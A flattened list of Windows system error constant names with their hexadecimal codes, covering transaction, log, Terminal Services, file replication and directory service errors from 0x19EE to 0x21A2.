LOG_FULL_HANDLER_IN_PROGRESS = 0x19EE + LOG_CONTAINER_READ_FAILED = 0x19EF + LOG_CONTAINER_WRITE_FAILED = 0x19F0 + LOG_CONTAINER_OPEN_FAILED = 0x19F1 + LOG_CONTAINER_STATE_INVALID = 0x19F2 + LOG_STATE_INVALID = 0x19F3 + LOG_PINNED = 0x19F4 + LOG_METADATA_FLUSH_FAILED = 0x19F5 + LOG_INCONSISTENT_SECURITY = 0x19F6 + LOG_APPENDED_FLUSH_FAILED = 0x19F7 + LOG_PINNED_RESERVATION = 0x19F8 + INVALID_TRANSACTION = 0x1A2C + TRANSACTION_NOT_ACTIVE = 0x1A2D + TRANSACTION_REQUEST_NOT_VALID = 0x1A2E + TRANSACTION_NOT_REQUESTED = 0x1A2F + TRANSACTION_ALREADY_ABORTED = 0x1A30 + TRANSACTION_ALREADY_COMMITTED = 0x1A31 + TM_INITIALIZATION_FAILED = 0x1A32 + RESOURCEMANAGER_READ_ONLY = 0x1A33 + TRANSACTION_NOT_JOINED = 0x1A34 + TRANSACTION_SUPERIOR_EXISTS = 0x1A35 + CRM_PROTOCOL_ALREADY_EXISTS = 0x1A36 + TRANSACTION_PROPAGATION_FAILED = 0x1A37 + CRM_PROTOCOL_NOT_FOUND = 0x1A38 + TRANSACTION_INVALID_MARSHALL_BUFFER = 0x1A39 + CURRENT_TRANSACTION_NOT_VALID = 0x1A3A + TRANSACTION_NOT_FOUND = 0x1A3B + RESOURCEMANAGER_NOT_FOUND = 0x1A3C + ENLISTMENT_NOT_FOUND = 0x1A3D + TRANSACTIONMANAGER_NOT_FOUND = 0x1A3E + TRANSACTIONMANAGER_NOT_ONLINE = 0x1A3F + TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION = 0x1A40 + TRANSACTION_NOT_ROOT = 0x1A41 + TRANSACTION_OBJECT_EXPIRED = 0x1A42 + TRANSACTION_RESPONSE_NOT_ENLISTED = 0x1A43 + TRANSACTION_RECORD_TOO_LONG = 0x1A44 + IMPLICIT_TRANSACTION_NOT_SUPPORTED = 0x1A45 + TRANSACTION_INTEGRITY_VIOLATED = 0x1A46 + TRANSACTIONMANAGER_IDENTITY_MISMATCH = 0x1A47 + RM_CANNOT_BE_FROZEN_FOR_SNAPSHOT = 0x1A48 + TRANSACTION_MUST_WRITETHROUGH = 0x1A49 + TRANSACTION_NO_SUPERIOR = 0x1A4A + HEURISTIC_DAMAGE_POSSIBLE = 0x1A4B + TRANSACTIONAL_CONFLICT = 0x1A90 + RM_NOT_ACTIVE = 0x1A91 + RM_METADATA_CORRUPT = 0x1A92 + DIRECTORY_NOT_RM = 0x1A93 + TRANSACTIONS_UNSUPPORTED_REMOTE = 0x1A95 + LOG_RESIZE_INVALID_SIZE = 0x1A96 + OBJECT_NO_LONGER_EXISTS = 0x1A97 + STREAM_MINIVERSION_NOT_FOUND = 0x1A98 + STREAM_MINIVERSION_NOT_VALID = 0x1A99 + MINIVERSION_INACCESSIBLE_FROM_SPECIFIED_TRANSACTION = 0x1A9A + CANT_OPEN_MINIVERSION_WITH_MODIFY_INTENT = 0x1A9B + CANT_CREATE_MORE_STREAM_MINIVERSIONS = 0x1A9C + REMOTE_FILE_VERSION_MISMATCH = 0x1A9E + HANDLE_NO_LONGER_VALID = 0x1A9F + NO_TXF_METADATA = 0x1AA0 + LOG_CORRUPTION_DETECTED = 0x1AA1 + CANT_RECOVER_WITH_HANDLE_OPEN = 0x1AA2 + RM_DISCONNECTED = 0x1AA3 + ENLISTMENT_NOT_SUPERIOR = 0x1AA4 + RECOVERY_NOT_NEEDED = 0x1AA5 + RM_ALREADY_STARTED = 0x1AA6 + FILE_IDENTITY_NOT_PERSISTENT = 0x1AA7 + CANT_BREAK_TRANSACTIONAL_DEPENDENCY = 0x1AA8 + CANT_CROSS_RM_BOUNDARY = 0x1AA9 + TXF_DIR_NOT_EMPTY = 0x1AAA + INDOUBT_TRANSACTIONS_EXIST = 0x1AAB + TM_VOLATILE = 0x1AAC + ROLLBACK_TIMER_EXPIRED = 0x1AAD + TXF_ATTRIBUTE_CORRUPT = 0x1AAE + EFS_NOT_ALLOWED_IN_TRANSACTION = 0x1AAF + TRANSACTIONAL_OPEN_NOT_ALLOWED = 0x1AB0 + LOG_GROWTH_FAILED = 0x1AB1 + TRANSACTED_MAPPING_UNSUPPORTED_REMOTE = 0x1AB2 + TXF_METADATA_ALREADY_PRESENT = 0x1AB3 + TRANSACTION_SCOPE_CALLBACKS_NOT_SET = 0x1AB4 + TRANSACTION_REQUIRED_PROMOTION = 0x1AB5 + CANNOT_EXECUTE_FILE_IN_TRANSACTION = 0x1AB6 + TRANSACTIONS_NOT_FROZEN = 0x1AB7 + TRANSACTION_FREEZE_IN_PROGRESS = 0x1AB8 + NOT_SNAPSHOT_VOLUME = 0x1AB9 + NO_SAVEPOINT_WITH_OPEN_FILES = 0x1ABA + DATA_LOST_REPAIR = 0x1ABB + SPARSE_NOT_ALLOWED_IN_TRANSACTION = 0x1ABC + TM_IDENTITY_MISMATCH = 0x1ABD + FLOATED_SECTION = 0x1ABE + CANNOT_ACCEPT_TRANSACTED_WORK = 0x1ABF + CANNOT_ABORT_TRANSACTIONS = 0x1AC0 + BAD_CLUSTERS = 0x1AC1 + COMPRESSION_NOT_ALLOWED_IN_TRANSACTION = 0x1AC2 + VOLUME_DIRTY = 0x1AC3 + NO_LINK_TRACKING_IN_TRANSACTION = 0x1AC4 + OPERATION_NOT_SUPPORTED_IN_TRANSACTION = 0x1AC5 + EXPIRED_HANDLE = 0x1AC6 + TRANSACTION_NOT_ENLISTED = 0x1AC7 + CTX_WINSTATION_NAME_INVALID = 0x1B59 + CTX_INVALID_PD = 0x1B5A + CTX_PD_NOT_FOUND = 0x1B5B + CTX_WD_NOT_FOUND = 0x1B5C + CTX_CANNOT_MAKE_EVENTLOG_ENTRY = 0x1B5D + CTX_SERVICE_NAME_COLLISION = 0x1B5E + CTX_CLOSE_PENDING = 0x1B5F + CTX_NO_OUTBUF = 0x1B60 + CTX_MODEM_INF_NOT_FOUND = 0x1B61 + CTX_INVALID_MODEMNAME = 0x1B62 + CTX_MODEM_RESPONSE_ERROR = 0x1B63 + CTX_MODEM_RESPONSE_TIMEOUT = 0x1B64 + CTX_MODEM_RESPONSE_NO_CARRIER = 0x1B65 + CTX_MODEM_RESPONSE_NO_DIALTONE = 0x1B66 + CTX_MODEM_RESPONSE_BUSY = 0x1B67 + CTX_MODEM_RESPONSE_VOICE = 0x1B68 + CTX_TD_ERROR = 0x1B69 + CTX_WINSTATION_NOT_FOUND = 0x1B6E + CTX_WINSTATION_ALREADY_EXISTS = 0x1B6F + CTX_WINSTATION_BUSY = 0x1B70 + CTX_BAD_VIDEO_MODE = 0x1B71 + CTX_GRAPHICS_INVALID = 0x1B7B + CTX_LOGON_DISABLED = 0x1B7D + CTX_NOT_CONSOLE = 0x1B7E + CTX_CLIENT_QUERY_TIMEOUT = 0x1B80 + CTX_CONSOLE_DISCONNECT = 0x1B81 + CTX_CONSOLE_CONNECT = 0x1B82 + CTX_SHADOW_DENIED = 0x1B84 + CTX_WINSTATION_ACCESS_DENIED = 0x1B85 + CTX_INVALID_WD = 0x1B89 + CTX_SHADOW_INVALID = 0x1B8A + CTX_SHADOW_DISABLED = 0x1B8B + CTX_CLIENT_LICENSE_IN_USE = 0x1B8C + CTX_CLIENT_LICENSE_NOT_SET = 0x1B8D + CTX_LICENSE_NOT_AVAILABLE = 0x1B8E + CTX_LICENSE_CLIENT_INVALID = 0x1B8F + CTX_LICENSE_EXPIRED = 0x1B90 + CTX_SHADOW_NOT_RUNNING = 0x1B91 + CTX_SHADOW_ENDED_BY_MODE_CHANGE = 0x1B92 + ACTIVATION_COUNT_EXCEEDED = 0x1B93 + CTX_WINSTATIONS_DISABLED = 0x1B94 + CTX_ENCRYPTION_LEVEL_REQUIRED = 0x1B95 + CTX_SESSION_IN_USE = 0x1B96 + CTX_NO_FORCE_LOGOFF = 0x1B97 + CTX_ACCOUNT_RESTRICTION = 0x1B98 + RDP_PROTOCOL_ERROR = 0x1B99 + CTX_CDM_CONNECT = 0x1B9A + CTX_CDM_DISCONNECT = 0x1B9B + CTX_SECURITY_LAYER_ERROR = 0x1B9C + TS_INCOMPATIBLE_SESSIONS = 0x1B9D + TS_VIDEO_SUBSYSTEM_ERROR = 0x1B9E + FRS_ERR_INVALID_API_SEQUENCE = 0x1F41 + FRS_ERR_STARTING_SERVICE = 0x1F42 + FRS_ERR_STOPPING_SERVICE = 0x1F43 + FRS_ERR_INTERNAL_API = 0x1F44 + FRS_ERR_INTERNAL = 0x1F45 + FRS_ERR_SERVICE_COMM = 0x1F46 + FRS_ERR_INSUFFICIENT_PRIV = 0x1F47 + FRS_ERR_AUTHENTICATION = 0x1F48 + FRS_ERR_PARENT_INSUFFICIENT_PRIV = 0x1F49 + FRS_ERR_PARENT_AUTHENTICATION = 0x1F4A + FRS_ERR_CHILD_TO_PARENT_COMM = 0x1F4B + FRS_ERR_PARENT_TO_CHILD_COMM = 0x1F4C + FRS_ERR_SYSVOL_POPULATE = 0x1F4D + FRS_ERR_SYSVOL_POPULATE_TIMEOUT = 0x1F4E + FRS_ERR_SYSVOL_IS_BUSY = 0x1F4F + FRS_ERR_SYSVOL_DEMOTE = 0x1F50 + FRS_ERR_INVALID_SERVICE_PARAMETER = 0x1F51 + DS_NOT_INSTALLED = 0x2008 + DS_MEMBERSHIP_EVALUATED_LOCALLY = 0x2009 + DS_NO_ATTRIBUTE_OR_VALUE = 0x200A + DS_INVALID_ATTRIBUTE_SYNTAX = 0x200B + DS_ATTRIBUTE_TYPE_UNDEFINED = 0x200C + DS_ATTRIBUTE_OR_VALUE_EXISTS = 0x200D + DS_BUSY = 0x200E + DS_UNAVAILABLE = 0x200F + DS_NO_RIDS_ALLOCATED = 0x2010 + DS_NO_MORE_RIDS = 0x2011 + DS_INCORRECT_ROLE_OWNER = 0x2012 + DS_RIDMGR_INIT_ERROR = 0x2013 + DS_OBJ_CLASS_VIOLATION = 0x2014 + DS_CANT_ON_NON_LEAF = 0x2015 + DS_CANT_ON_RDN = 0x2016 + DS_CANT_MOD_OBJ_CLASS = 0x2017 + DS_CROSS_DOM_MOVE_ERROR = 0x2018 + DS_GC_NOT_AVAILABLE = 0x2019 + SHARED_POLICY = 0x201A + POLICY_OBJECT_NOT_FOUND = 0x201B + POLICY_ONLY_IN_DS = 0x201C + PROMOTION_ACTIVE = 0x201D + NO_PROMOTION_ACTIVE = 0x201E + DS_OPERATIONS_ERROR = 0x2020 + DS_PROTOCOL_ERROR = 0x2021 + DS_TIMELIMIT_EXCEEDED = 0x2022 + DS_SIZELIMIT_EXCEEDED = 0x2023 + DS_ADMIN_LIMIT_EXCEEDED = 0x2024 + DS_COMPARE_FALSE = 0x2025 + DS_COMPARE_TRUE = 0x2026 + DS_AUTH_METHOD_NOT_SUPPORTED = 0x2027 + DS_STRONG_AUTH_REQUIRED = 0x2028 + DS_INAPPROPRIATE_AUTH = 0x2029 + DS_AUTH_UNKNOWN = 0x202A + DS_REFERRAL = 0x202B + DS_UNAVAILABLE_CRIT_EXTENSION = 0x202C + DS_CONFIDENTIALITY_REQUIRED = 0x202D + DS_INAPPROPRIATE_MATCHING = 0x202E + DS_CONSTRAINT_VIOLATION = 0x202F + DS_NO_SUCH_OBJECT = 0x2030 + DS_ALIAS_PROBLEM = 0x2031 + DS_INVALID_DN_SYNTAX = 0x2032 + DS_IS_LEAF = 0x2033 + DS_ALIAS_DEREF_PROBLEM = 0x2034 + DS_UNWILLING_TO_PERFORM = 0x2035 + DS_LOOP_DETECT = 0x2036 + DS_NAMING_VIOLATION = 0x2037 + DS_OBJECT_RESULTS_TOO_LARGE = 0x2038 + DS_AFFECTS_MULTIPLE_DSAS = 0x2039 + DS_SERVER_DOWN = 0x203A + DS_LOCAL_ERROR = 0x203B + DS_ENCODING_ERROR = 0x203C + DS_DECODING_ERROR = 0x203D + DS_FILTER_UNKNOWN = 0x203E + DS_PARAM_ERROR = 0x203F + DS_NOT_SUPPORTED = 0x2040 + DS_NO_RESULTS_RETURNED = 0x2041 + DS_CONTROL_NOT_FOUND = 0x2042 + DS_CLIENT_LOOP = 0x2043 + DS_REFERRAL_LIMIT_EXCEEDED = 0x2044 + DS_SORT_CONTROL_MISSING = 0x2045 + DS_OFFSET_RANGE_ERROR = 0x2046 + DS_ROOT_MUST_BE_NC = 0x206D + DS_ADD_REPLICA_INHIBITED = 0x206E + DS_ATT_NOT_DEF_IN_SCHEMA = 0x206F + DS_MAX_OBJ_SIZE_EXCEEDED = 0x2070 + DS_OBJ_STRING_NAME_EXISTS = 0x2071 + DS_NO_RDN_DEFINED_IN_SCHEMA = 0x2072 + DS_RDN_DOESNT_MATCH_SCHEMA = 0x2073 + DS_NO_REQUESTED_ATTS_FOUND = 0x2074 + DS_USER_BUFFER_TO_SMALL = 0x2075 + DS_ATT_IS_NOT_ON_OBJ = 0x2076 + DS_ILLEGAL_MOD_OPERATION = 0x2077 + DS_OBJ_TOO_LARGE = 0x2078 + DS_BAD_INSTANCE_TYPE = 0x2079 + DS_MASTERDSA_REQUIRED = 0x207A + DS_OBJECT_CLASS_REQUIRED = 0x207B + DS_MISSING_REQUIRED_ATT = 0x207C + DS_ATT_NOT_DEF_FOR_CLASS = 0x207D + DS_ATT_ALREADY_EXISTS = 0x207E + DS_CANT_ADD_ATT_VALUES = 0x2080 + DS_SINGLE_VALUE_CONSTRAINT = 0x2081 + DS_RANGE_CONSTRAINT = 0x2082 + DS_ATT_VAL_ALREADY_EXISTS = 0x2083 + DS_CANT_REM_MISSING_ATT = 0x2084 + DS_CANT_REM_MISSING_ATT_VAL = 0x2085 + DS_ROOT_CANT_BE_SUBREF = 0x2086 + DS_NO_CHAINING = 0x2087 + DS_NO_CHAINED_EVAL = 0x2088 + DS_NO_PARENT_OBJECT = 0x2089 + DS_PARENT_IS_AN_ALIAS = 0x208A + DS_CANT_MIX_MASTER_AND_REPS = 0x208B + DS_CHILDREN_EXIST = 0x208C + DS_OBJ_NOT_FOUND = 0x208D + DS_ALIASED_OBJ_MISSING = 0x208E + DS_BAD_NAME_SYNTAX = 0x208F + DS_ALIAS_POINTS_TO_ALIAS = 0x2090 + DS_CANT_DEREF_ALIAS = 0x2091 + DS_OUT_OF_SCOPE = 0x2092 + DS_CANT_DELETE_DSA_OBJ = 0x2094 + DS_GENERIC_ERROR = 0x2095 + DS_DSA_MUST_BE_INT_MASTER = 0x2096 + DS_CLASS_NOT_DSA = 0x2097 + DS_INSUFF_ACCESS_RIGHTS = 0x2098 + DS_ILLEGAL_SUPERIOR = 0x2099 + DS_ATTRIBUTE_OWNED_BY_SAM = 0x209A + DS_NAME_TOO_MANY_PARTS = 0x209B + DS_NAME_TOO_LONG = 0x209C + DS_NAME_VALUE_TOO_LONG = 0x209D + DS_NAME_UNPARSEABLE = 0x209E + DS_NAME_TYPE_UNKNOWN = 0x209F + DS_NOT_AN_OBJECT = 0x20A0 + DS_SEC_DESC_TOO_SHORT = 0x20A1 + DS_SEC_DESC_INVALID = 0x20A2 + DS_NO_DELETED_NAME = 0x20A3 + DS_SUBREF_MUST_HAVE_PARENT = 0x20A4 + DS_NCNAME_MUST_BE_NC = 0x20A5 + DS_CANT_ADD_SYSTEM_ONLY = 0x20A6 + DS_CLASS_MUST_BE_CONCRETE = 0x20A7 + DS_INVALID_DMD = 0x20A8 + DS_OBJ_GUID_EXISTS = 0x20A9 + DS_NOT_ON_BACKLINK = 0x20AA + DS_NO_CROSSREF_FOR_NC = 0x20AB + DS_SHUTTING_DOWN = 0x20AC + DS_UNKNOWN_OPERATION = 0x20AD + DS_INVALID_ROLE_OWNER = 0x20AE + DS_COULDNT_CONTACT_FSMO = 0x20AF + DS_CROSS_NC_DN_RENAME = 0x20B0 + DS_CANT_MOD_SYSTEM_ONLY = 0x20B1 + DS_REPLICATOR_ONLY = 0x20B2 + DS_OBJ_CLASS_NOT_DEFINED = 0x20B3 + DS_OBJ_CLASS_NOT_SUBCLASS = 0x20B4 + DS_NAME_REFERENCE_INVALID = 0x20B5 + DS_CROSS_REF_EXISTS = 0x20B6 + DS_CANT_DEL_MASTER_CROSSREF = 0x20B7 + DS_SUBTREE_NOTIFY_NOT_NC_HEAD = 0x20B8 + DS_NOTIFY_FILTER_TOO_COMPLEX = 0x20B9 + DS_DUP_RDN = 0x20BA + DS_DUP_OID = 0x20BB + DS_DUP_MAPI_ID = 0x20BC + DS_DUP_SCHEMA_ID_GUID = 0x20BD + DS_DUP_LDAP_DISPLAY_NAME = 0x20BE + DS_SEMANTIC_ATT_TEST = 0x20BF + DS_SYNTAX_MISMATCH = 0x20C0 + DS_EXISTS_IN_MUST_HAVE = 0x20C1 + DS_EXISTS_IN_MAY_HAVE = 0x20C2 + DS_NONEXISTENT_MAY_HAVE = 0x20C3 + DS_NONEXISTENT_MUST_HAVE = 0x20C4 + DS_AUX_CLS_TEST_FAIL = 0x20C5 + DS_NONEXISTENT_POSS_SUP = 0x20C6 + DS_SUB_CLS_TEST_FAIL = 0x20C7 + DS_BAD_RDN_ATT_ID_SYNTAX = 0x20C8 + DS_EXISTS_IN_AUX_CLS = 0x20C9 + DS_EXISTS_IN_SUB_CLS = 0x20CA + DS_EXISTS_IN_POSS_SUP = 0x20CB + DS_RECALCSCHEMA_FAILED = 0x20CC + DS_TREE_DELETE_NOT_FINISHED = 0x20CD + DS_CANT_DELETE = 0x20CE + DS_ATT_SCHEMA_REQ_ID = 0x20CF + DS_BAD_ATT_SCHEMA_SYNTAX = 0x20D0 + DS_CANT_CACHE_ATT = 0x20D1 + DS_CANT_CACHE_CLASS = 0x20D2 + DS_CANT_REMOVE_ATT_CACHE = 0x20D3 + DS_CANT_REMOVE_CLASS_CACHE = 0x20D4 + DS_CANT_RETRIEVE_DN = 0x20D5 + DS_MISSING_SUPREF = 0x20D6 + DS_CANT_RETRIEVE_INSTANCE = 0x20D7 + DS_CODE_INCONSISTENCY = 0x20D8 + DS_DATABASE_ERROR = 0x20D9 + DS_GOVERNSID_MISSING = 0x20DA + DS_MISSING_EXPECTED_ATT = 0x20DB + DS_NCNAME_MISSING_CR_REF = 0x20DC + DS_SECURITY_CHECKING_ERROR = 0x20DD + DS_SCHEMA_NOT_LOADED = 0x20DE + DS_SCHEMA_ALLOC_FAILED = 0x20DF + DS_ATT_SCHEMA_REQ_SYNTAX = 0x20E0 + DS_GCVERIFY_ERROR = 0x20E1 + DS_DRA_SCHEMA_MISMATCH = 0x20E2 + DS_CANT_FIND_DSA_OBJ = 0x20E3 + DS_CANT_FIND_EXPECTED_NC = 0x20E4 + DS_CANT_FIND_NC_IN_CACHE = 0x20E5 + DS_CANT_RETRIEVE_CHILD = 0x20E6 + DS_SECURITY_ILLEGAL_MODIFY = 0x20E7 + DS_CANT_REPLACE_HIDDEN_REC = 0x20E8 + DS_BAD_HIERARCHY_FILE = 0x20E9 + DS_BUILD_HIERARCHY_TABLE_FAILED = 0x20EA + DS_CONFIG_PARAM_MISSING = 0x20EB + DS_COUNTING_AB_INDICES_FAILED = 0x20EC + DS_HIERARCHY_TABLE_MALLOC_FAILED = 0x20ED + DS_INTERNAL_FAILURE = 0x20EE + DS_UNKNOWN_ERROR = 0x20EF + DS_ROOT_REQUIRES_CLASS_TOP = 0x20F0 + DS_REFUSING_FSMO_ROLES = 0x20F1 + DS_MISSING_FSMO_SETTINGS = 0x20F2 + DS_UNABLE_TO_SURRENDER_ROLES = 0x20F3 + DS_DRA_GENERIC = 0x20F4 + DS_DRA_INVALID_PARAMETER = 0x20F5 + DS_DRA_BUSY = 0x20F6 + DS_DRA_BAD_DN = 0x20F7 + DS_DRA_BAD_NC = 0x20F8 + DS_DRA_DN_EXISTS = 0x20F9 + DS_DRA_INTERNAL_ERROR = 0x20FA + DS_DRA_INCONSISTENT_DIT = 0x20FB + DS_DRA_CONNECTION_FAILED = 0x20FC + DS_DRA_BAD_INSTANCE_TYPE = 0x20FD + DS_DRA_OUT_OF_MEM = 0x20FE + DS_DRA_MAIL_PROBLEM = 0x20FF + DS_DRA_REF_ALREADY_EXISTS = 0x2100 + DS_DRA_REF_NOT_FOUND = 0x2101 + DS_DRA_OBJ_IS_REP_SOURCE = 0x2102 + DS_DRA_DB_ERROR = 0x2103 + DS_DRA_NO_REPLICA = 0x2104 + DS_DRA_ACCESS_DENIED = 0x2105 + DS_DRA_NOT_SUPPORTED = 0x2106 + DS_DRA_RPC_CANCELLED = 0x2107 + DS_DRA_SOURCE_DISABLED = 0x2108 + DS_DRA_SINK_DISABLED = 0x2109 + DS_DRA_NAME_COLLISION = 0x210A + DS_DRA_SOURCE_REINSTALLED = 0x210B + DS_DRA_MISSING_PARENT = 0x210C + DS_DRA_PREEMPTED = 0x210D + DS_DRA_ABANDON_SYNC = 0x210E + DS_DRA_SHUTDOWN = 0x210F + DS_DRA_INCOMPATIBLE_PARTIAL_SET = 0x2110 + DS_DRA_SOURCE_IS_PARTIAL_REPLICA = 0x2111 + DS_DRA_EXTN_CONNECTION_FAILED = 0x2112 + DS_INSTALL_SCHEMA_MISMATCH = 0x2113 + DS_DUP_LINK_ID = 0x2114 + DS_NAME_RESOLVING = 0x2115 + DS_NAME_NOT_FOUND = 0x2116 + DS_NAME_ERROR_NOT_UNIQUE = 0x2117 + DS_NAME_NO_MAPPING = 0x2118 + DS_NAME_DOMAIN_ONLY = 0x2119 + DS_NAME_NO_SYNTACTICAL_MAPPING = 0x211A + DS_CONSTRUCTED_ATT_MOD = 0x211B + DS_WRONG_OM_OBJ_CLASS = 0x211C + DS_DRA_REPL_PENDING = 0x211D + DS_DS_REQUIRED = 0x211E + DS_INVALID_LDAP_DISPLAY_NAME = 0x211F + DS_NON_BASE_SEARCH = 0x2120 + DS_CANT_RETRIEVE_ATTS = 0x2121 + DS_BACKLINK_WITHOUT_LINK = 0x2122 + DS_EPOCH_MISMATCH = 0x2123 + DS_SRC_NAME_MISMATCH = 0x2124 + DS_SRC_AND_DST_NC_IDENTICAL = 0x2125 + DS_DST_NC_MISMATCH = 0x2126 + DS_NOT_AUTHORITIVE_FOR_DST_NC = 0x2127 + DS_SRC_GUID_MISMATCH = 0x2128 + DS_CANT_MOVE_DELETED_OBJECT = 0x2129 + DS_PDC_OPERATION_IN_PROGRESS = 0x212A + DS_CROSS_DOMAIN_CLEANUP_REQD = 0x212B + DS_ILLEGAL_XDOM_MOVE_OPERATION = 0x212C + DS_CANT_WITH_ACCT_GROUP_MEMBERSHPS = 0x212D + DS_NC_MUST_HAVE_NC_PARENT = 0x212E + DS_CR_IMPOSSIBLE_TO_VALIDATE = 0x212F + DS_DST_DOMAIN_NOT_NATIVE = 0x2130 + DS_MISSING_INFRASTRUCTURE_CONTAINER = 0x2131 + DS_CANT_MOVE_ACCOUNT_GROUP = 0x2132 + DS_CANT_MOVE_RESOURCE_GROUP = 0x2133 + DS_INVALID_SEARCH_FLAG = 0x2134 + DS_NO_TREE_DELETE_ABOVE_NC = 0x2135 + DS_COULDNT_LOCK_TREE_FOR_DELETE = 0x2136 + DS_COULDNT_IDENTIFY_OBJECTS_FOR_TREE_DELETE = 0x2137 + DS_SAM_INIT_FAILURE = 0x2138 + DS_SENSITIVE_GROUP_VIOLATION = 0x2139 + DS_CANT_MOD_PRIMARYGROUPID = 0x213A + DS_ILLEGAL_BASE_SCHEMA_MOD = 0x213B + DS_NONSAFE_SCHEMA_CHANGE = 0x213C + DS_SCHEMA_UPDATE_DISALLOWED = 0x213D + DS_CANT_CREATE_UNDER_SCHEMA = 0x213E + DS_INSTALL_NO_SRC_SCH_VERSION = 0x213F + DS_INSTALL_NO_SCH_VERSION_IN_INIFILE = 0x2140 + DS_INVALID_GROUP_TYPE = 0x2141 + DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN = 0x2142 + DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN = 0x2143 + DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER = 0x2144 + DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER = 0x2145 + DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER = 0x2146 + DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER = 0x2147 + DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER = 0x2148 + DS_HAVE_PRIMARY_MEMBERS = 0x2149 + DS_STRING_SD_CONVERSION_FAILED = 0x214A + DS_NAMING_MASTER_GC = 0x214B + DS_LOOKUP_FAILURE = 0x214C + DS_COULDNT_UPDATE_SPNS = 0x214D + DS_CANT_RETRIEVE_SD = 0x214E + DS_KEY_NOT_UNIQUE = 0x214F + DS_WRONG_LINKED_ATT_SYNTAX = 0x2150 + DS_SAM_NEED_BOOTKEY_PASSWORD = 0x2151 + DS_SAM_NEED_BOOTKEY_FLOPPY = 0x2152 + DS_CANT_START = 0x2153 + DS_INIT_FAILURE = 0x2154 + DS_NO_PKT_PRIVACY_ON_CONNECTION = 0x2155 + DS_SOURCE_DOMAIN_IN_FOREST = 0x2156 + DS_DESTINATION_DOMAIN_NOT_IN_FOREST = 0x2157 + DS_DESTINATION_AUDITING_NOT_ENABLED = 0x2158 + DS_CANT_FIND_DC_FOR_SRC_DOMAIN = 0x2159 + DS_SRC_OBJ_NOT_GROUP_OR_USER = 0x215A + DS_SRC_SID_EXISTS_IN_FOREST = 0x215B + DS_SRC_AND_DST_OBJECT_CLASS_MISMATCH = 0x215C + SAM_INIT_FAILURE = 0x215D + DS_DRA_SCHEMA_INFO_SHIP = 0x215E + DS_DRA_SCHEMA_CONFLICT = 0x215F + DS_DRA_EARLIER_SCHEMA_CONLICT = 0x2160 + DS_DRA_OBJ_NC_MISMATCH = 0x2161 + DS_NC_STILL_HAS_DSAS = 0x2162 + DS_GC_REQUIRED = 0x2163 + DS_LOCAL_MEMBER_OF_LOCAL_ONLY = 0x2164 + DS_NO_FPO_IN_UNIVERSAL_GROUPS = 0x2165 + DS_CANT_ADD_TO_GC = 0x2166 + DS_NO_CHECKPOINT_WITH_PDC = 0x2167 + DS_SOURCE_AUDITING_NOT_ENABLED = 0x2168 + DS_CANT_CREATE_IN_NONDOMAIN_NC = 0x2169 + DS_INVALID_NAME_FOR_SPN = 0x216A + DS_FILTER_USES_CONTRUCTED_ATTRS = 0x216B + DS_UNICODEPWD_NOT_IN_QUOTES = 0x216C + DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED = 0x216D + DS_MUST_BE_RUN_ON_DST_DC = 0x216E + DS_SRC_DC_MUST_BE_SP4_OR_GREATER = 0x216F + DS_CANT_TREE_DELETE_CRITICAL_OBJ = 0x2170 + DS_INIT_FAILURE_CONSOLE = 0x2171 + DS_SAM_INIT_FAILURE_CONSOLE = 0x2172 + DS_FOREST_VERSION_TOO_HIGH = 0x2173 + DS_DOMAIN_VERSION_TOO_HIGH = 0x2174 + DS_FOREST_VERSION_TOO_LOW = 0x2175 + DS_DOMAIN_VERSION_TOO_LOW = 0x2176 + DS_INCOMPATIBLE_VERSION = 0x2177 + DS_LOW_DSA_VERSION = 0x2178 + DS_NO_BEHAVIOR_VERSION_IN_MIXEDDOMAIN = 0x2179 + DS_NOT_SUPPORTED_SORT_ORDER = 0x217A + DS_NAME_NOT_UNIQUE = 0x217B + DS_MACHINE_ACCOUNT_CREATED_PRENT4 = 0x217C + DS_OUT_OF_VERSION_STORE = 0x217D + DS_INCOMPATIBLE_CONTROLS_USED = 0x217E + DS_NO_REF_DOMAIN = 0x217F + DS_RESERVED_LINK_ID = 0x2180 + DS_LINK_ID_NOT_AVAILABLE = 0x2181 + DS_AG_CANT_HAVE_UNIVERSAL_MEMBER = 0x2182 + DS_MODIFYDN_DISALLOWED_BY_INSTANCE_TYPE = 0x2183 + DS_NO_OBJECT_MOVE_IN_SCHEMA_NC = 0x2184 + DS_MODIFYDN_DISALLOWED_BY_FLAG = 0x2185 + DS_MODIFYDN_WRONG_GRANDPARENT = 0x2186 + DS_NAME_TRUST_REFERRAL = 0x2187 + NOT_SUPPORTED_ON_STANDARD_SERVER = 0x2188 + DS_CANT_ACCESS_REMOTE_PART_OF_AD = 0x2189 + DS_CR_IMPOSSIBLE_TO_VALIDATE_V2 = 0x218A + DS_THREAD_LIMIT_EXCEEDED = 0x218B + DS_NOT_CLOSEST = 0x218C + DS_CANT_DERIVE_SPN_WITHOUT_SERVER_REF = 0x218D + DS_SINGLE_USER_MODE_FAILED = 0x218E + DS_NTDSCRIPT_SYNTAX_ERROR = 0x218F + DS_NTDSCRIPT_PROCESS_ERROR = 0x2190 + DS_DIFFERENT_REPL_EPOCHS = 0x2191 + DS_DRS_EXTENSIONS_CHANGED = 0x2192 + DS_REPLICA_SET_CHANGE_NOT_ALLOWED_ON_DISABLED_CR = 0x2193 + DS_NO_MSDS_INTID = 0x2194 + DS_DUP_MSDS_INTID = 0x2195 + DS_EXISTS_IN_RDNATTID = 0x2196 + DS_AUTHORIZATION_FAILED = 0x2197 + DS_INVALID_SCRIPT = 0x2198 + DS_REMOTE_CROSSREF_OP_FAILED = 0x2199 + DS_CROSS_REF_BUSY = 0x219A + DS_CANT_DERIVE_SPN_FOR_DELETED_DOMAIN = 0x219B + DS_CANT_DEMOTE_WITH_WRITEABLE_NC = 0x219C + DS_DUPLICATE_ID_FOUND = 0x219D + DS_INSUFFICIENT_ATTR_TO_CREATE_OBJECT = 0x219E + DS_GROUP_CONVERSION_ERROR = 0x219F + DS_CANT_MOVE_APP_BASIC_GROUP = 0x21A0 + DS_CANT_MOVE_APP_QUERY_GROUP = 0x21A1 + DS_ROLE_NOT_VERIFIED = 0x21A2 + 